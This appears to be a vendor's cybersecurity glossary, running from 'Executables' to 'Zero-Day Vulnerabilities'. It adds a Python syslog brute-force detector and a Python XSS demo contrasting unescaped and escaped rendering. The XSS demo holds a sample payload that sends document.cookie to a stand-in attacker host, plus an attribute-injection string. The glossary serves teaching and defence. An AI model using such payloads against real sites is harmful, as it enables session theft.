
Cybersecurity 101: A Complete Cybersecurity Glossary

Cybersecurity is becoming even more important in today’s world. From people protecting their personal information to organizations safeguarding their sensitive data, you need to understand these cybersecurity terms. 

Check out Huntress's comprehensive cybersecurity glossary to learn key cybersecurity terminology and the words and phrases cybersecurity professionals use most often. Consider this your cybersecurity encyclopedia to help you make informed decisions about online security and stay updated on emerging threats.

Executables

Code files or programs that instruct a computer to perform specific actions when opened.

Exploit

Code or a technique that takes advantage of a vulnerability in a system or software to achieve an attacker's goal, such as running arbitrary code, escalating privileges, or bypassing a security control.

Extended Detection and Response (XDR)

XDR collects and correlates telemetry from multiple sources, including endpoints, cloud workloads, networks, identities, and email, so that activity seen in one place can be tied to related activity elsewhere. The goal is to detect, investigate, and respond to threats, unauthorized access, and other misuse faster than siloed tools allow.

Federal Information Security Management Act (FISMA)

FISMA is a U.S. federal law enacted in 2002 that requires federal agencies to implement information security programs to protect their data and information systems. It sets standards for how agencies should assess, manage, and mitigate cybersecurity risks.

File Integrity Monitoring (FIM)

File Integrity Monitoring is a security process that detects changes to assets such as files, directories, configuration data, databases, and operating system components by comparing their current state (typically cryptographic hashes, permissions, and attributes) against a known-good baseline, then alerting on unexpected changes.

Fileless Malware

Fileless malware runs primarily in memory rather than writing a conventional executable to disk. It typically abuses legitimate, already-installed tools such as PowerShell or WMI and may stash its payload in places like the Windows Registry or scheduled tasks, which leaves few file artifacts for traditional antivirus to scan and makes detection harder.

Firewall

A firewall is a security system that monitors and filters incoming and outgoing network traffic to prevent unauthorized access to a network. It acts as a barrier that allows or blocks traffic based on a predefined set of rules, traditionally keyed on source and destination addresses, ports, protocols, and connection state. Next-generation firewalls add deeper inspection of packet contents to identify applications and known threats. If traffic violates a rule or is flagged as malicious, the firewall drops it before it reaches the protected network.

Footholds

Mechanisms a threat actor plants so that malware or attacker access survives reboots, logoffs, or partial cleanup, and is re-established automatically after a device has been cleaned. Also known as "persistence mechanisms."

Full Disk Access (FDA)

A macOS TCC permission that grants an application access to protected user data (for example Mail, Messages, Safari data, and Time Machine backups) that is otherwise off limits to third-party software.

General Data Protection Regulation (GDPR)

The GDPR is a European Union regulation on information privacy that governs how the personal data of people in the EU can be processed and transferred.

Golden Ticket Attack

An attack on Windows Active Directory in which a threat actor who has already obtained the password hash of the domain's KRBTGT account uses it to forge Kerberos Ticket Granting Tickets (TGTs) for any user, including domain administrators. Because the forged tickets are signed with the real KRBTGT key, they are accepted as valid and give the attacker persistent, domain-wide access; the attack requires prior high-privilege access to a domain controller or its secrets, and recovery requires rotating the KRBTGT password twice.

Google Cloud Platform (GCP)

Google Cloud Platform is one of the 3 major cloud providers. GCP lets businesses use Google's infrastructure and technology to build and run applications, analyze data, and power their operations.

Health Insurance Portability and Accountability Act (HIPAA)

A US federal law established in 1996, HIPAA mandates the protection and confidential handling of people’s medical information.

Honeypots

Honeypots are cybersecurity mechanisms that gather intelligence on cybercriminals' identities, methods, and motivations. They use decoy targets to lure cybercriminals away from legitimate targets.

IP (Internet Protocol) Address

A numeric identifier assigned to a device on an IP network so that packets can be routed to it. IPv4 addresses are written as four decimal numbers separated by dots (for example 192.0.2.10); IPv6 addresses are written as groups of hexadecimal digits separated by colons. An address must be unique within the network it is used on, but private addresses are reused across many separate networks.

IPS (Intrusion Prevention System)

An Intrusion Prevention System is a form of network security that identifies malicious activity, collects information about it, reports it, and attempts to block or stop it. An IPS works by actively inspecting network traffic for malicious behavior and known attack patterns. Like an IDS, an IPS is designed to warn of suspicious activity; the key difference is that it sits inline and can also take automated action, such as dropping packets or resetting connections, based on a predetermined set of rules.

ITDR (Identity Threat Detection and Response)

Identity Threat Detection and Response is a cybersecurity discipline focused on protecting identity infrastructure (directories, identity providers, and the accounts, tokens, and sessions they issue) from attack. ITDR tooling detects identity-centric attacks such as credential theft, token replay, and malicious application consent, and assists with remediation such as revoking sessions and resetting compromised accounts.

Incident Response

Incident response in cybersecurity refers to the strategies and procedures for responding to cyber threats and attacks in a network.

Information Security or InfoSec

InfoSec is the set of policies, procedures, and controls an organization puts in place to protect the confidentiality, integrity, and availability of its data and systems against unauthorized access, modification, or disruption.

Infrastructure-as-a-Service (IaaS)

IaaS is a cloud computing model in which the provider offers virtualized compute, storage, and networking resources on demand. The customer builds virtual machines and virtual networks on that infrastructure and remains responsible for securing the operating systems, applications, and data running on it.

Initial Access

The point of entry into a network or system: the process by which an adversary gains a first foothold in a victim's environment, for example through phishing, exploiting a public-facing application, or using stolen credentials. Initial Access is also the name of the corresponding tactic in the MITRE ATT&CK framework.

Integrations

In cybersecurity, integrations describe the capability of different computers and software systems to work together and exchange data.

Intrusion Detection System (IDS)

An IDS is a security tool that detects signs of cyber threats and notifies administrators, without blocking traffic itself. HIDS (Host-based Intrusion Detection) runs on individual endpoints and inspects local activity such as logs and file changes; NIDS (Network-based Intrusion Detection) inspects traffic on the network.

Just-in-time (JIT)

JIT access refers to granting specific privileges only when they are needed and removing them when they are no longer required, rather than leaving accounts permanently privileged. This significantly shrinks the window in which elevated privileges exist and minimizes the risk of their unauthorized use or misuse.

Kerberos

Kerberos is a ticket-based authentication protocol that uses symmetric cryptography and a trusted third party, the Key Distribution Center (KDC), to verify the identity of users and hosts without sending passwords over the network. It is the default authentication protocol in Windows Active Directory domains.

Keylogger

A keylogger is software (or, less commonly, a hardware device) that records a user's keystrokes and sends them to an attacker in order to capture passwords or other critical information.

LAN (Local Area Network)

A LAN is a grouping of electronic devices in the same physical location.

LOLBins

LOLBins stands for Living Off the Land Binaries. These are legitimate, preinstalled programs or tools that ship with the operating system (on Windows, examples include certutil, mshta, and rundll32). Attackers abuse these signed, trusted binaries for malicious purposes, such as downloading payloads or executing code, instead of introducing new, suspicious files that security tools would flag.

Least Privilege

The principle of giving users, services, and processes only the minimum access necessary to perform their functions. Least privilege limits access to sensitive data and systems to those who truly need it for their work, so a compromised account or component can do less damage.

Machine Learning (ML)

Machine learning lets computers learn patterns from data and make decisions or predictions without being explicitly programmed with rules for each case.

Malspam

Malspam is a spam email that delivers malware, often through malicious attachments (like infected documents or executables) or links that, when clicked, download malware onto the recipient's device.

Malware

Malicious software designed to harm a computer, network, or server. Malware includes things like viruses, worms, Trojans, ransomware, spyware, or adware.

Malware Analysis

Malware analysis is the process of understanding the behavior and purpose of suspicious files or URLs to help detect and mitigate potential threats.

Man-in-the-middle

This type of cyber attack (also called adversary-in-the-middle) involves a threat actor positioning themselves between two parties, typically a user and an application, so they can intercept, read, or modify the communications or data exchanged between them for malicious purposes.

Managed Detection and Response (MDR)

A cybersecurity service combining technology and human expertise to perform threat hunting, monitoring, and response. MDR technology collects and analyzes information from logs, events, networks, endpoints and user behavior—which is then paired with a team of experts who can take over to validate incidents, escalate critical events and provide recommended response actions so threats can be quickly remediated. MDR services are managed or co-managed by an outside partner to provide value to organizations that either have limited resources or lack the expertise to keep eyes on all of their potential attack surfaces.

Managed IT Services

Managed outside an organization by external vendors, managed IT services providers give businesses the expertise and resources to manage their IT infrastructure and operations. This can include tasks like network management, cybersecurity, data backup and recovery, and software updates, freeing up internal IT staff to focus on strategic initiatives.

Managed Security Service Providers (MSSP)

Third-party organizations providing outsourced security services.

Mobile Device Management (MDM)

Software, usually delivered as a SaaS platform, that business devices are enrolled in so an organization can centrally configure them, enforce security policies, and deploy or remove software on a large number of devices at once. MDM is used across macOS, Windows, iOS, and Android devices.

Multi-Factor Authentication (MFA)

An authentication method that requires users to provide two or more verification factors before being granted access or signed in. These factors can include something only the user knows (e.g., a password or PIN), something only the user has (e.g., a hardware token or authenticator app), or something only the user is (e.g., a biometric). MFA combines these factors to confirm the identity of someone requesting access to an application, website, or other resource. MFA is a key control in defending against account takeover.

National Institute of Standards and Technology (NIST)

NIST is a US government agency that advances measurement science, standards, and technology to enhance economic security. In cybersecurity it is best known for the NIST Cybersecurity Framework and the Special Publication 800 series of security guidelines.

Network Control

Endpoint firewalls that enable total control over network traffic using dynamic ACLs.

Network Detection and Response (NDR)

An integrated network security solution designed to detect threats and suspicious behavior on an organization's networks using non-signature-based techniques (such as machine learning and other analytical techniques). NDR solutions track north/south network traffic that crosses the perimeter, as well as east/west lateral traffic to establish a baseline of normal behavior and raise alerts when anomalous behavior is detected. NDR solutions give security teams real-time visibility and awareness over network traffic and the ability to respond to perceived threats.

Next-Generation Antivirus (NGAV)

An expanded version of antivirus that goes beyond performing signature-based detection—typically by incorporating some type of advanced technology—to prevent a wider range of attacks. Unlike traditional AV, next-generation AV focuses on events (files, processes, applications, network connections, etc.) to help identify malicious intent or activity. NGAV has emerged in recent years to address the proliferation of new types of malware and viruses that can easily bypass traditional AV.

Observability

Understanding a system's internal state by observing its external outputs.

On-Prem

On-premises is a physical infrastructural setup deployed, running, and maintained within the confines of an organization typically in a datacenter or COLO (Colocation Facility).

Open Source Intelligence (OSINT)

OSINT refers to the gathering and analysis of publicly available data for intelligence purposes.

Open Web Application Security Project (OWASP)

OWASP is a nonprofit foundation and open community focused on improving the security of software, particularly web applications. It is best known for the OWASP Top 10, a regularly updated list of the most critical web application security risks.

Password Management Tool

A password management tool is software that stores and protects confidential information like usernames and passwords for local applications and online services. A password manager will house a user’s passwords, as well as other information, in one convenient location with one master password. The information is encrypted and often requires multi-factor authentication to access.

Payment Card Industry Data Security Standard (PCI-DSS)

PCI-DSS is a set of rules and guidelines for companies that handle credit card transactions to keep this information safe.

Persistence

Persistence refers to the techniques an attacker uses to keep malware running or retain access to a system across interruptions such as reboots, logoffs, credential changes, or partial cleanup, all while staying undetected.

Persistent Foothold

A persistent foothold is an attacker mechanism that automatically re-triggers malware (whether a small stub or a fully loaded payload) across interruptions such as restarts or user logoffs, for example via a scheduled task, a service, or a run key.

Phishing

Malicious attempts to trick users into revealing sensitive information through deceptive emails or links. Learn more about phishing through our guide, What is Phishing (and How Does It Affect Your Business)?

Platform-as-a-Service (PaaS)

PaaS is a complete cloud environment that includes everything developers need to build, run and manage applications.

Proxy

A system or router that acts as an intermediary between a user and the internet, forwarding requests and responses on the user's behalf. Proxies can be used to filter or log traffic, hide the client's address, or, in an attacker's hands, to relay and inspect a victim's traffic.

Quantum Computing

Very different from classical computing, quantum computing refers to computation that uses quantum-mechanical phenomena such as superposition and entanglement. It matters to security because a sufficiently large quantum computer could break widely used public-key algorithms such as RSA and elliptic-curve cryptography, which is driving the move to post-quantum cryptography.

Ransomware

Ransomware is malicious software that encrypts data and demands payment, usually in cryptocurrency, for the decryption key. Many modern ransomware operations also exfiltrate data before encrypting it and threaten to publish it if the ransom is not paid.

Red Team

A red team is a group of internal or external security experts who simulate the tactics, techniques, and procedures of real adversaries against an organization's network as an exercise, to test how well its defenses and defenders detect and respond.

Remote Access

As the name implies, remote access refers to accessing network resources from a geographical distance through a network connection.

Rogue Apps

Rogue Apps is a new Managed ITDR capability that enables Huntress to identify unsafe applications installed in a protected tenant. Rogue Apps represents Managed ITDR’s next step in wrecking hacker identity tradecraft. With this new capability, Huntress detects “Traitorware,” which are legitimate apps used badly that we detect by name, and “Stealthware,” which refers specifically to unknown apps that our algorithm marks as suspicious.

Security Information and Event Management (SIEM)

SIEM stands for Security Information and Event Management. A SIEM is a software solution that aggregates and analyzes activity from many different sources across an entire IT infrastructure. It gathers immense amounts of log and event data from the networked environment, then normalizes, correlates, and presents that data in a form humans can work with. With the data categorized and laid out, SIEM solutions are often used by security operations centers (SOCs) to streamline visibility across an environment, centralize data for security monitoring, and investigate logs and events during incident response.

SPAN (Switched Port Analyzer)

A switched port analyzer is a dedicated port on a switch that receives a mirrored copy of the traffic passing through one or more other ports or VLANs on that switch. Analysts connect a capture or monitoring system to it to review network traffic with software like Wireshark or to feed a network IDS.

SQL Injection (SQLi)

A cyberattack in which an attacker supplies input that an application concatenates into a SQL query, so that the input is interpreted as SQL code rather than data. Depending on the database and the query, this can let the attacker bypass authentication, read or modify data, or in some cases execute commands on the server. The standard defense is to use parameterized queries (prepared statements) so that user input is never treated as part of the query text.

Security Operations Center (SOC)

A centralized unit that deals with security issues on an organizational and technical level. SOCs are typically staffed with a team of domain experts (either in-house or outsourced) who focus on preventing, detecting, analyzing and responding to cybersecurity incidents. A SOC acts as a central command post that continuously monitors an organization’s environments and toolsets and improves its security posture. Learn more about what the Huntress SOC brings to your tech stack.

Security Orchestration, Automation and Response (SOAR)

A collection of software solutions and tools that aggregate security intelligence and context from disparate systems, and applies machine intelligence to streamline (or even completely automate) the threat detection and response process. SOAR combines three software capabilities: the management of threats and vulnerabilities (orchestration), automating security operations (automation) and responding to security incidents (response). Due to its aggregation and automation capabilities, SOAR solutions are often used by security operation centers (SOCs) to collect threat-related data from a range of sources and automate the responses to certain threats.

Session

A session is a time-limited, stateful exchange between two or more systems over a network. In web applications a session is usually identified by a token (often a cookie) issued after login so the user does not have to re-authenticate on every request.

Session Hijacking

Session hijacking is an attack in which a threat actor steals, predicts, or otherwise obtains a valid session token and replays it to impersonate the user, gaining unauthorized access to their account and data without needing the password and often bypassing MFA that was completed when the session was created.

Software-as-a-Service (SaaS)

SaaS is a software licensing model which allows access to software on a subscription basis using external servers.

Spear Phishing

Spear phishing is a targeted phishing attack using researched information to deceive specific individuals.

Stealthware

Unknown and rare applications with broad permissions that provide attackers with a backdoor into the tenant environment. These globally unique, single, or multi-tenanted malicious applications often fly under the radar of traditional security tools and can be leveraged for persistent access, phishing campaigns, and data theft.

Suricata

An open source network threat detection engine that can run as an IDS (Intrusion Detection System), as an inline IPS, and as a network security monitoring tool, matching traffic against signature rules and producing protocol logs.

Syslog

A standard protocol and message format (defined in RFC 3164 and RFC 5424) that computer systems and network devices use to send event logs to a central collector for storage and analysis. Syslog is commonly sent over UDP or TCP port 514, or over TLS on port 6514 when confidentiality and integrity of the logs matter.

TCP/IP

Transmission Control Protocol/Internet Protocol is the set of standardized rules that allow computers to communicate on a network such as the internet. IP handles addressing and routing of packets, while TCP provides reliable, ordered delivery on top of it.

Threat Actor

Threat actor refers to people or groups conducting cyberattacks with malicious intent.

Threat Hunting

Proactively searching across various telemetry for threats is referred to as threat hunting. This involves analyzing system logs, network traffic, and other data sources to uncover malicious activity that may have evaded existing security controls.
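The Syslog, SIEM, and Threat Hunting entries above all come down to the same mechanics: parse event lines into fields, then look for a pattern across them that no single line reveals. The Python below is an added example (not code from the original page or from Huntress) that parses BSD-style syslog lines, counts failed SSH logins per source address in a sliding time window, and flags sources that exceed a threshold, noting whether a successful login followed. The log lines, host names, and addresses are constructed for the example; the year assumed for the timestamps is arbitrary because BSD syslog omits it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample syslog lines (RFC 3164 style); hosts and addresses are
# made up and taken from documentation address ranges.
SAMPLE_LOGS = """\
Mar  3 10:01:02 web01 sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 50022 ssh2
Mar  3 10:01:04 web01 sshd[2101]: Failed password for root from 203.0.113.7 port 50023 ssh2
Mar  3 10:01:05 web01 sshd[2103]: Accepted publickey for deploy from 198.51.100.20 port 41000 ssh2
Mar  3 10:01:06 web01 sshd[2104]: Failed password for root from 203.0.113.7 port 50024 ssh2
Mar  3 10:01:09 web01 sshd[2105]: Failed password for root from 203.0.113.7 port 50025 ssh2
Mar  3 10:01:11 web01 sshd[2106]: Failed password for root from 203.0.113.7 port 50026 ssh2
Mar  3 10:01:40 web01 sshd[2107]: Accepted password for root from 203.0.113.7 port 50027 ssh2
Mar  3 10:02:00 web01 sshd[2108]: Failed password for bob from 198.51.100.20 port 41001 ssh2
"""

# BSD syslog header: "Mon dd HH:MM:SS host program[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
ACCEPTED_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+)")


def parse_line(line, assumed_year=2024):
    """Split one syslog line into fields; return None for lines that do not parse."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    # BSD syslog carries no year, so one is assumed purely for ordering.
    fields["ts"] = datetime.strptime(fields["ts"], "%b %d %H:%M:%S").replace(year=assumed_year)
    return fields


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return (source_ip, max_failures_in_window, success_after_failures) for each
    source address with at least `threshold` failed logins inside `window_seconds`."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["prog"] != "sshd":
            continue
        if (m := FAILED_RE.search(ev["msg"])):
            failures[m["ip"]].append(ev["ts"])
        elif (m := ACCEPTED_RE.search(ev["msg"])):
            successes[m["ip"]].append(ev["ts"])

    findings = []
    for ip, times in failures.items():
        times.sort()
        # Sliding window: advance the left edge until the span fits the window,
        # tracking the largest number of failures seen inside any one window.
        best, left = 0, 0
        for right in range(len(times)):
            while (times[right] - times[left]).total_seconds() > window_seconds:
                left += 1
            best = max(best, right - left + 1)
        if best >= threshold:
            last_failure = times[-1]
            success_after = any(t >= last_failure for t in successes.get(ip, []))
            findings.append((ip, best, success_after))
    return findings


if __name__ == "__main__":
    for ip, count, followed_by_success in detect_bruteforce(SAMPLE_LOGS.splitlines()):
        print(f"{ip}: {count} failed logins in window, success afterwards: {followed_by_success}")
```

On the sample data only 203.0.113.7 trips the rule, and because an "Accepted password" for root from that address follows the failures, the finding is a likely compromise rather than just noise. The same shape (parse, group by an entity, evaluate a condition over a window) is what a SIEM correlation rule or a hunting query does at scale.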

Traitorware

Legitimate applications often abused by attackers, such as eM Client, PerfectData Software, and Newsletter Software Supermailer. These applications may appear harmless but can be exploited for malicious activities like phishing, data exfiltration, and financial fraud.

Transparency, Consent, & Control (TCC)

The macOS privacy framework, backed by a locally stored database, that restricts applications from accessing sensitive user data and device capabilities (such as the camera, microphone, and protected folders) unless the user has granted permission. Full Disk Access is one of the permissions TCC manages.

Tunnel

In cybersecurity, a tunnel is a secure, encrypted connection that lets data be transmitted privately over an untrusted network.

Unauthorized Access

Unauthorized access occurs when a person or entity connects to or uses a system, application, or data without permission, whether by exploiting a vulnerability, using stolen credentials, or abusing excessive privileges, typically as a prelude to further malicious actions.

Unified Audit

Unified audits combine multiple logs into a single location for centralized viewing and analysis. They comprehensively view security events across the entire IT infrastructure, including endpoints, servers, networks, and cloud environments.

Virtual Machines (VM)

A virtual machine is a software emulation of a computer that runs its own operating system and applications in an isolated environment, typically alongside other VMs on a single physical server managed by a hypervisor.

Virtual Private Network (VPN)

A VPN creates an encrypted tunnel between a device and a network over an untrusted network such as the internet. Remote work environments often use VPNs to give users secure access to internal network resources from outside the office.

Vishing

Typically short for voice phishing, vishing involves fraudulent phone calls that trick a victim into giving sensitive data like login credentials, credit card numbers, or bank details.

Vulnerability

Vulnerabilities are weaknesses in software or hardware that can be exploited by malicious actors. Examples include a flaw in software, a misconfiguration, or a human error.

Weaponization

In cybersecurity, weaponization is the stage (named in the Cyber Kill Chain) in which an attacker turns otherwise harmless tools or documents into a delivery vehicle for harm, for example by pairing an exploit with a malicious payload inside a document or installer.

Web Application Firewall (WAF)

A WAF is a tool that helps protect web applications, mobile app backends, and APIs from attacks such as SQL injection and cross-site scripting by filtering and monitoring the HTTP and HTTPS traffic between them and the Internet.

XSS (Cross-Site Scripting)

XSS is an injection attack in which attacker-controlled input is included in a web page without proper encoding, so that the victim's browser runs it as script in the context of the legitimate site. This lets the attacker steal session tokens, perform actions as the user, or deface the page. The primary defense is to encode untrusted data for the context in which it is rendered; a Content Security Policy adds defense in depth.
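As an added example (not code from the original page or from Huntress), the Python below renders a user comment into HTML two ways: by string concatenation, which lets markup in the comment become part of the page, and with `html.escape`, which encodes it so the browser shows it as text. The comment body, the author string, and the `attacker.invalid` hostname in the payload are constructed for the example.

```python
import html


def render_comment_vulnerable(author, body):
    # Untrusted strings go into the HTML unchanged, so a body containing
    # markup becomes real markup and an author string can break out of the
    # attribute value it was meant to sit inside.
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author, body):
    # html.escape encodes <, >, & and (with quote=True, the default) both quote
    # characters, which is what the HTML body and attribute contexts need.
    # Other contexts (inside a <script> block, a URL, or CSS) need their own
    # encoders; this function is only correct for these two contexts.
    return (
        f'<div class="comment" data-author="{html.escape(author)}">'
        f"<p>{html.escape(body)}</p></div>"
    )


def demo():
    # Constructed payloads: a script that would exfiltrate the cookie, and an
    # author value that closes the attribute and adds an event handler.
    body = '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
    author = '" onmouseover="alert(1)'
    return {
        "vulnerable": render_comment_vulnerable(author, body),
        "safe": render_comment_safe(author, body),
    }


if __name__ == "__main__":
    for name, markup in demo().items():
        print(f"{name}: {markup}")
```

In the vulnerable output the `<script>` element and the injected `onmouseover` handler are live; in the safe output they survive only as the escaped text `&lt;script&gt;` and `&quot; onmouseover=...`, which the browser displays rather than executes.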

YARA Rules

YARA rules describe malware families or suspicious content as patterns (text strings, hex byte sequences, and regular expressions) combined with a boolean condition, written in YARA's own rule language. When a file or process memory is scanned, YARA compares it against the loaded rules and reports every rule whose condition matches, flagging the object for further analysis.

Zero Trust Architecture

A Zero Trust Architecture refers to the way network devices and services are structured to enable a Zero Trust security model.

Zero Trust Network Access (ZTNA)

ZTNA is an IT technology solution that requires all users to be authenticated, authorized, and continuously validated for security configuration and posture before being granted or keeping access to applications and data.

Zero Trust Security

Zero Trust is a security concept requiring all users to be authenticated and authorized before granting access to applications and data.

Zero-Day Vulnerabilities

Zero-day vulnerabilities are security flaws that are unknown to the vendor or developer, so no patch exists; attackers who discover them can exploit them before a fix can be released, leaving defenders "zero days" to prepare.